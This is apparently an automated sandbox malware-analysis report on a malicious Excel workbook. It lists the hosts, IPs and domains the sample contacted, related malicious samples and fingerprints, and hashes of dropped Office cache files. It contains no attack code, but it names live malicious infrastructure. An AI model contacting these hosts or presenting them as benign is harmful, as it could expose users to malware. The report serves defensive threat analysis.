                                                                                                                                high
                                                                                                                                https://ncus.pagecontentsync.66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.office.com/66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                                    high
                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                                      high
                                                                                                                                      https://augloop.office.com/v266988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                                        high
                                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                                          high
                                                                                                                                          https://skyapi.live.net/Activity/66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://clients.config.office.net/user/v1.0/mac66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.o365filtering.com66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://api.cortana.ai66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://onedrive.live.com66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                                              high
                                                                                                                                              https://ovisualuiapp.azurewebsites.net/pbiagave/66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                                              • 0%, Virustotal, Browse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devices66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                                                high
                                                                                                                                                https://directory.services.66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://login.windows-ppe.net/common/oauth2/authorize66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://staging.cortana.ai66988849-8D57-437E-97F2-4EBE1CC53C33.1.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown

                                                                                                                                                  Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  104.244.121.13
                                                                                                                                                  jaipurbynite.comUnited States
                                                                                                                                                  22611IMH-WESTUSfalse
                                                                                                                                                  103.28.39.29
                                                                                                                                                  khangland.proViet Nam
                                                                                                                                                  131353NHANHOA-AS-VNNhanHoaSoftwarecompanyVNfalse

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                  Analysis ID:442112
                                                                                                                                                  Start date:30.06.2021
                                                                                                                                                  Start time:00:07:35
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 5m 24s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:light
                                                                                                                                                  Sample file name:plan-515372324.xlsb
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                  Number of analysed new started processes analysed:18
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal72.expl.evad.winXLSB@7/10@2/2
                                                                                                                                                  EGA Information:Failed
                                                                                                                                                  HDC Information:Failed
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .xlsb
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                  • Scroll down
                                                                                                                                                  • Close Viewer
                                                                                                                                                  Warnings:
                                                                                                                                                  Show All
                                                                                                                                                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 52.255.188.83, 52.109.88.177, 52.109.8.24, 20.82.210.154, 20.54.104.15, 40.112.88.60, 205.185.216.10, 205.185.216.42, 20.50.102.62, 80.67.82.235, 80.67.82.211, 20.82.209.183
                                                                                                                                                  • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  TimeTypeDescription
                                                                                                                                                  00:08:25API Interceptor1155x Sleep call for process: splwow64.exe modified

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  103.28.39.29plan-536150726.xlsbGet hashmaliciousBrowse
                                                                                                                                                    https://otochothue.com/ahead/89963/89963.zipGet hashmaliciousBrowse
                                                                                                                                                      https://otochothue.com/ahead/20376640/20376640.zipGet hashmaliciousBrowse

                                                                                                                                                        Domains

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        khangland.proplan-536150726.xlsbGet hashmaliciousBrowse
                                                                                                                                                        • 103.28.39.29

                                                                                                                                                        ASN

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        IMH-WESTUSdqVPlpmWYt.exeGet hashmaliciousBrowse
                                                                                                                                                        • 74.124.211.132
                                                                                                                                                        chems.exeGet hashmaliciousBrowse
                                                                                                                                                        • 192.249.117.18
                                                                                                                                                        Mohamed Abrar H CV.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 205.134.252.239
                                                                                                                                                        INVOICE125POR.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 205.134.252.239
                                                                                                                                                        DHL AWB TRACKING DETAILS.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.247.72.46
                                                                                                                                                        PACKING LIST CORP INVOICE 2738829 DATED 26 FOR SHIPMENT AS STATED ON 26 APRIL05I992lcNll.exeGet hashmaliciousBrowse
                                                                                                                                                        • 192.145.239.54
                                                                                                                                                        PACKING LIST CORP INVOICE 2738829 DATED 26 FOR SHIPMENT AS STATED ON 26 APRIL05I992lc.exeGet hashmaliciousBrowse
                                                                                                                                                        • 192.145.239.54
                                                                                                                                                        DHL AWB TRACKING DETAILS.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.247.72.46
                                                                                                                                                        PACKING LIST CORP INVOICE 2738829 DATED 26 FOR SHIPMENT AS STATED ON 26 APRIL05I.exeGet hashmaliciousBrowse
                                                                                                                                                        • 192.145.239.54
                                                                                                                                                        Telex.exeGet hashmaliciousBrowse
                                                                                                                                                        • 192.145.239.54
                                                                                                                                                        PO 367628usa.exeGet hashmaliciousBrowse
                                                                                                                                                        • 209.182.202.96
                                                                                                                                                        eLECTRONIC Flight Ticket Invoice confirmationETKT XXXXX3939 INVOICE 000Z1298932 TKT Payment.exeGet hashmaliciousBrowse
                                                                                                                                                        • 192.145.239.54
                                                                                                                                                        eLECTRONIC Flight Ticket Confirmation VIS XXXXX3939 INVOICE 000Z1298932 TKT Payment.exeGet hashmaliciousBrowse
                                                                                                                                                        • 192.145.239.54
                                                                                                                                                        scan of document 5336227.xlsmGet hashmaliciousBrowse
                                                                                                                                                        • 192.249.126.181
                                                                                                                                                        scan of invoice 91510.xlsmGet hashmaliciousBrowse
                                                                                                                                                        • 192.249.126.181
                                                                                                                                                        scan of bill 0905.xlsmGet hashmaliciousBrowse
                                                                                                                                                        • 192.249.126.181
                                                                                                                                                        PO9448882.exeGet hashmaliciousBrowse
                                                                                                                                                        • 209.182.202.96
                                                                                                                                                        check 6746422.xlsmGet hashmaliciousBrowse
                                                                                                                                                        • 192.249.126.181
                                                                                                                                                        TKT eLECTRONIC Flight Ticket Confirmation VIS XXXXX83939 INVOICE 000Z1298932 TKT.exeGet hashmaliciousBrowse
                                                                                                                                                        • 192.145.239.54
                                                                                                                                                        proforma invoice.exeGet hashmaliciousBrowse
                                                                                                                                                        • 192.249.124.39
                                                                                                                                                        NHANHOA-AS-VNNhanHoaSoftwarecompanyVNdLlF0bPWxx.exeGet hashmaliciousBrowse
                                                                                                                                                        • 103.28.36.10
                                                                                                                                                        eNjIpT5RzD.exeGet hashmaliciousBrowse
                                                                                                                                                        • 103.28.36.10
                                                                                                                                                        Plq7ADczmp.exeGet hashmaliciousBrowse
                                                                                                                                                        • 103.28.36.10
                                                                                                                                                        Nuvoco_RFQ_21-06-2021.exeGet hashmaliciousBrowse
                                                                                                                                                        • 103.124.93.155
                                                                                                                                                        plan-536150726.xlsbGet hashmaliciousBrowse
                                                                                                                                                        • 103.28.39.29
                                                                                                                                                        #U20ac9,770 pdf.exeGet hashmaliciousBrowse
                                                                                                                                                        • 103.28.36.229
                                                                                                                                                        c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                        • 103.57.209.110
                                                                                                                                                        1400000004-arrival.exeGet hashmaliciousBrowse
                                                                                                                                                        • 103.28.36.198
                                                                                                                                                        payment invoice.exeGet hashmaliciousBrowse
                                                                                                                                                        • 103.28.36.198
                                                                                                                                                        Adjunto K_23165.docGet hashmaliciousBrowse
                                                                                                                                                        • 103.28.39.103
                                                                                                                                                        Adjunto K_23165.docGet hashmaliciousBrowse
                                                                                                                                                        • 103.28.39.103
                                                                                                                                                        211094.exeGet hashmaliciousBrowse
                                                                                                                                                        • 103.28.36.171
                                                                                                                                                        PO20210120.exeGet hashmaliciousBrowse
                                                                                                                                                        • 103.124.93.25
                                                                                                                                                        Electronic form.docGet hashmaliciousBrowse
                                                                                                                                                        • 103.124.92.138
                                                                                                                                                        SecuriteInfo.com.ArtemisC5924E341E9E.exeGet hashmaliciousBrowse
                                                                                                                                                        • 103.28.36.10
                                                                                                                                                        Informacion 122020 N-98239.docGet hashmaliciousBrowse
                                                                                                                                                        • 103.28.39.103
                                                                                                                                                        INFO.docGet hashmaliciousBrowse
                                                                                                                                                        • 103.28.39.103
                                                                                                                                                        document-17616846.xlsGet hashmaliciousBrowse
                                                                                                                                                        • 103.101.161.13
                                                                                                                                                        document-17616846.xlsGet hashmaliciousBrowse
                                                                                                                                                        • 103.101.161.13
                                                                                                                                                        Information-822908953.docGet hashmaliciousBrowse
                                                                                                                                                        • 103.101.162.60

                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        37f463bf4616ecd445d4a1937da06e19djBbDPfGV3.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.244.121.13
                                                                                                                                                        • 103.28.39.29
                                                                                                                                                        CMXz729xzg.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.244.121.13
                                                                                                                                                        • 103.28.39.29
                                                                                                                                                        #Ud83d#Udcde_#U25b6Play_to_Listen.htmGet hashmaliciousBrowse
                                                                                                                                                        • 104.244.121.13
                                                                                                                                                        • 103.28.39.29
                                                                                                                                                        jssloader.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.244.121.13
                                                                                                                                                        • 103.28.39.29
                                                                                                                                                        gYbyE02c71.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.244.121.13
                                                                                                                                                        • 103.28.39.29
                                                                                                                                                        Copy of Check.htmlGet hashmaliciousBrowse
                                                                                                                                                        • 104.244.121.13
                                                                                                                                                        • 103.28.39.29
                                                                                                                                                        diagram-1878769052.xlsGet hashmaliciousBrowse
                                                                                                                                                        • 104.244.121.13
                                                                                                                                                        • 103.28.39.29
                                                                                                                                                        statistic-1496367785.xlsGet hashmaliciousBrowse
                                                                                                                                                        • 104.244.121.13
                                                                                                                                                        • 103.28.39.29
                                                                                                                                                        Bank_ details.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.244.121.13
                                                                                                                                                        • 103.28.39.29
                                                                                                                                                        prijenos SWIFT za partiju 220000000001182910.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.244.121.13
                                                                                                                                                        • 103.28.39.29
                                                                                                                                                        PO29012021,pdf.ppamGet hashmaliciousBrowse
                                                                                                                                                        • 104.244.121.13
                                                                                                                                                        • 103.28.39.29
                                                                                                                                                        OFfcxY5xia.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.244.121.13
                                                                                                                                                        • 103.28.39.29
                                                                                                                                                        k72fFnCoEX.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.244.121.13
                                                                                                                                                        • 103.28.39.29
                                                                                                                                                        DWJn18MuX6.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.244.121.13
                                                                                                                                                        • 103.28.39.29
                                                                                                                                                        sp7UUM849P.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.244.121.13
                                                                                                                                                        • 103.28.39.29
                                                                                                                                                        CL2SJ8-LYGF7Z-SEJ2QPPAPL.htmGet hashmaliciousBrowse
                                                                                                                                                        • 104.244.121.13
                                                                                                                                                        • 103.28.39.29
                                                                                                                                                        AqZrR9upiM.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.244.121.13
                                                                                                                                                        • 103.28.39.29
                                                                                                                                                        iduD2A1.dllGet hashmaliciousBrowse
                                                                                                                                                        • 104.244.121.13
                                                                                                                                                        • 103.28.39.29
                                                                                                                                                        E6973qZ1cV.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.244.121.13
                                                                                                                                                        • 103.28.39.29
                                                                                                                                                        97FC461FD24104740310BD741F7F8EBF489E640AA93A0.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.244.121.13
                                                                                                                                                        • 103.28.39.29

                                                                                                                                                        Dropped Files

                                                                                                                                                        No context

                                                                                                                                                        Created / dropped Files

                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\66988849-8D57-437E-97F2-4EBE1CC53C33
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                        File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):135209
                                                                                                                                                        Entropy (8bit):5.363066402926994
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:1536:RcQIKNgeBTA3gBwlpQ9DQW+zoY34ZliKWXboOidX5E6LWME9:lEQ9DQW+zwXO1
                                                                                                                                                        MD5:57CE0440BA2348963E599DB7CC6D4E70
                                                                                                                                                        SHA1:9DC6386C0EFC19B9E88725D079F1561C74D3B672
                                                                                                                                                        SHA-256:EF58DE4D929D2D78D172CFE4DCB94D8815D2447D6A7482670CC4E0CAB3C5283B
                                                                                                                                                        SHA-512:B09ED0537E02581F7BF417E73D07A26F42AA40E2E7457D5E67FAA61033A653844939EA5FF6CEEA08158469A70F0690A92454F57523D8DE05A263CD6B78C1AE65
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:low
                                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-29T22:08:25">.. Build: 16.0.14228.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\31DD4392.png
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                        File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):848
                                                                                                                                                        Entropy (8bit):7.595467031611744
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
                                                                                                                                                        MD5:02DB1068B56D3FD907241C2F3240F849
                                                                                                                                                        SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
                                                                                                                                                        SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
                                                                                                                                                        SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                        Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H*................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY*.^......IEND.B`.
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4A6A9A6B.png
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                        File Type:PNG image data, 246 x 108, 8-bit/color RGB, non-interlaced
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):10270
                                                                                                                                                        Entropy (8bit):7.975714699744477
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:3sXvKLMbye/PEXiKTUgCto9h4F6NwfU6vGDpdYNbcQZgkbd4cgc:3iLh/gJ59CDfU6LocbGK
                                                                                                                                                        MD5:9C4F09E387EA7B36C8149EA7C5F8876E
                                                                                                                                                        SHA1:FF83384288EB89964C3872367E43F25FAFF007CC
                                                                                                                                                        SHA-256:A51C1D65092272DAEB2541D64A10539F0D04BC2F51B281C7A3296500CFCA56DE
                                                                                                                                                        SHA-512:0FDDE22CFDDE8BB1C04842D2810D0FD6D42192594E0D6120DE401B08B7E2CFFB5333792BC748E93CD70FA14734CC7D950620CB977DDBBDB52D92BDA8F35521F8
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                        Preview: .PNG........IHDR.......l...........sRGB.........pHYs..........+....'.IDATx^.].|.U...%...J.".....H.&Ui......E.........D.7....U.i..FH#=......3..$K....'{3....7........0.H......H..03..,....8.q........'@\...S@.../.0=....|....}|......0.... ...,LO........q._`az.....8......... .`..) @...X...q..>N...>.........q........'@\...S@.../.0=....|....}|......0.... ...,LO........q._`az.....8...l..m.i'Sj.W.i.S.TJ....D.D._%...]..i.;J..b..T.).Ik.L6..L.mN....!*..\..'{$.o._b..h....t"@.?...y...d..h..|..B9D..CJD..t."........bR"....I)H....z.......>|.....E.x..r....J.U..[...p:D....XF......A...E.....b..C...C..C......=.Z..$.=../....Y..x5CY.0l..,~.W. .?......;...$.'....<.H.2...z..6(.E........kw8w^.\~...".C,gl&.m..J2.).HI.....b.r...'.....r.H...P.....'...A.^.q..j).cZ.^1~.|.........dv^.^v..X..v..6/^.$rR. iK..H.Uu.Pvk....U.....'.Fd..Z.]mu\*1.Zb.\b...N..P..&tr;.W....J.K(@.^A..R.S.[~.v.R.YO...0-...2..h."..............7..Ng...R...e.&..@..t..N...{5...W.x./#.%..}t...F8-..M1..(4b1....&.....)B...6.
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\55637970.png
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                        File Type:PNG image data, 934 x 29, 8-bit/color RGB, non-interlaced
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):42557
                                                                                                                                                        Entropy (8bit):7.992800895943226
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:768:Pfsq4UmepRdblCFcXhw9KnRTRews6xD0FvBlwAS1A8x7BcS0OvD230:PR3ZblCF28KRsws6CFv0AYx7Bl3b230
                                                                                                                                                        MD5:B1F262A694930ADB699FA94E3394887F
                                                                                                                                                        SHA1:9C9B66D3A3F09AECA45DB94304CDD6FB3C5BD4C9
                                                                                                                                                        SHA-256:9C99EC61392B9022A38C1354124360147E8185065095BD2EC92B1416CF9F4B68
                                                                                                                                                        SHA-512:1CA7E6750178B88EC3AA7A0B83348EA389E26C27E0D7E919D807BE470714E5B4F04ACEB69D391F0498D4E465E6620E9449CA2F40755B5CE8196E683502EBF5F4
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                        Preview: .PNG........IHDR.............6......sRGB.........pHYs..........+......IDATx^....dU....S.:ON.0.0....s0 .....$..%#HR.T.......$..0C...Su...[.TM..{.......C.S}..^{......].^..ZX.Wb.W....X!..A.P....0..u...X.V.3.....z..tiO{GW..?...A.......ca2Y.... ...cAX..zZ..2M.$..g.O.e..r?z&................*....*.=..Z.A........a.Z..ka<..N.R.c......./.[..j.^...Nk.(..y.,..z"...R..Z+..D1Q....z....0..u~..jU_.b.Z.V....:..5:.(.......-...A2.O.{..p.j..].<........0..0..+...E...^...z....#..j.d...X._..1..M.5..O.^.."..l....G....U1........X.6.Z.\.&..h..m*..T..xH.j..3<$.H...a..n....}t.A.jT.6G.h@..<.x..x...cb......C..{.D.'QW<.o~..?.....4F_..B..h.\...y8..)....j.Z.d..#P..P..O.....(.0...f....B_z>.E .w../..(...'.Fw..yT..G..)...b9..g.AA`.a..v.zfY.F........._r.i.d.`....Q.g.m"..\..&.t.X.q1}.$.S....2..~...d."..1.. (.0.F....t...i..@f.. ...(..8..q.....I.....ad.....z%....;...y.O...X<Q..X.....B..H........<)....4.&9.4......1.h..#B.....g.....bO.59.A..M.....J..vX3*5..X....(G.A.u...8.. .{
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\6B5ED695.png
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                        File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):557
                                                                                                                                                        Entropy (8bit):7.343009301479381
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
                                                                                                                                                        MD5:A516B6CB784827C6BDE58BC9D341C1BD
                                                                                                                                                        SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
                                                                                                                                                        SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
                                                                                                                                                        SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                        Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.|.-P#P;..p._.......jUG....X........IEND.B`.
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\D33DFFE4.png
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                        File Type:PNG image data, 521 x 246, 8-bit/color RGB, non-interlaced
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):32996
                                                                                                                                                        Entropy (8bit):7.975478139053759
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:N4k48AnTViUidx37OODgvnrxtxAudMN1VTRVHdB4K7K:NE8m+L37OOwrCXN1VTR1PK
                                                                                                                                                        MD5:4E69B72B0CE87CC7EE30AA1A062147FE
                                                                                                                                                        SHA1:09B0AA5414E08756E0AE53E1BE5C70DB4DEAF2E8
                                                                                                                                                        SHA-256:77A1F749389CBF771D5197FF0FF17113FCA1D91989ADCADF2852876A6CC14988
                                                                                                                                                        SHA-512:6246AF2137E773F7719033AFE75F0B00FF3A4B5543DBA53737FC8D33EE42478E3D8A5CF166E9EFD2F54A2F3E0D62417BDDC1CB824642305B59AB1229313D2D79
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:moderate, very likely benign file
